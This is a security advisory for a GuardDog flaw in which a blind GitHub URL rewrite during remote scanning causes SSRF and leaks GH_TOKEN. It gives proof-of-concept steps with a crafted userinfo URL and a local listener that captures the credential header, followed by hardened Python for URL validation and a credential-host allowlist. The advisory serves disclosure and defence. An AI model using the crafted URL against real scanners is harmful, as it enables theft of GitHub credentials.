CVE-2026-44971: GuardDog has a blind GitHub URL rewrite in remote project scanning that causes SSRF and `GH_TOKEN` exfiltration
The programmatic remote project scanning path rewrites attacker-controlled repository URLs using a blind string replacement and then sends the caller’s GitHub credentials with the resulting request. This allows an attacker who can influence the scanned repository URL to trigger SSRF and capture the GH_TOKEN used by GuardDog.
- Start an HTTP listener on `127.0.0.1:18081` that logs the request path and `Authorization` header.
- Set `GIT_USERNAME=alice` and `GH_TOKEN=supersecret`.
- Call `PypiRequirementsScanner().scan_remote("http://github@127.0.0.1:18081/owner/repo", "main", "requirements.txt")`.
- Observe a request to `/owner/repo/main/requirements.txt` with `Authorization: Basic YWxpY2U6c3VwZXJzZWNyZXQ=`.
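The mitigation a defender wants here is to parse the repository URL and pin the host before any rewrite or credential use, rather than string-replacing and trusting the result. The following added example is not GuardDog's code: `blind_rewrite` is a hypothetical illustration of the weak pattern described above (the exact substring GuardDog replaces is not on this page), shown next to a hardened rewrite and a separate allowlist gate that decides whether `GH_TOKEN` may be attached at all.

```python
from urllib.parse import urlsplit, urlunsplit

# Hosts that may ever receive the GitHub credentials. Assumption for this example:
# a raw-file fetch for a GitHub repository only needs these two.
CREDENTIAL_HOSTS = frozenset({"github.com", "raw.githubusercontent.com"})


def blind_rewrite(repo_url: str, ref: str, path: str) -> str:
    """Hypothetical illustration of the weak pattern in the advisory (not GuardDog's code):
    a substring replace that never looks at the host the request will actually reach."""
    return repo_url.replace("github", "raw.githubusercontent") + f"/{ref}/{path}"


def safe_raw_url(repo_url: str, ref: str, path: str) -> str:
    """Parse the URL and require an exact GitHub host with no userinfo or port before
    building the raw-content URL. Raises ValueError for anything else."""
    parts = urlsplit(repo_url)
    if parts.scheme != "https":
        raise ValueError(f"unexpected scheme: {parts.scheme!r}")
    if parts.username is not None or parts.password is not None:
        raise ValueError("userinfo in repository URL is not allowed")
    if parts.port is not None:
        raise ValueError("explicit port in repository URL is not allowed")
    if parts.hostname != "github.com":
        raise ValueError(f"unexpected host: {parts.hostname!r}")
    segments = [s for s in parts.path.split("/") if s]
    if len(segments) != 2 or any(s == ".." for s in segments + [ref, path]):
        raise ValueError("expected an /owner/repo path")
    owner, repo = segments
    return urlunsplit(("https", "raw.githubusercontent.com", f"/{owner}/{repo}/{ref}/{path}", "", ""))


def is_trusted_repo_url(repo_url: str) -> bool:
    """Boolean form of safe_raw_url's checks, for callers that only need a verdict."""
    try:
        safe_raw_url(repo_url, "main", "requirements.txt")
    except ValueError:
        return False
    return True


def may_send_credentials(url: str) -> bool:
    """Independent last gate: attach GH_TOKEN only when the final URL's host is allowlisted."""
    parts = urlsplit(url)
    return parts.scheme == "https" and parts.username is None and parts.hostname in CREDENTIAL_HOSTS
```

Run against the advisory's proof-of-concept URL, `blind_rewrite` still points at `127.0.0.1:18081` (only the userinfo changed), while `safe_raw_url` rejects it and `may_send_credentials` refuses to attach the token to the rewritten URL.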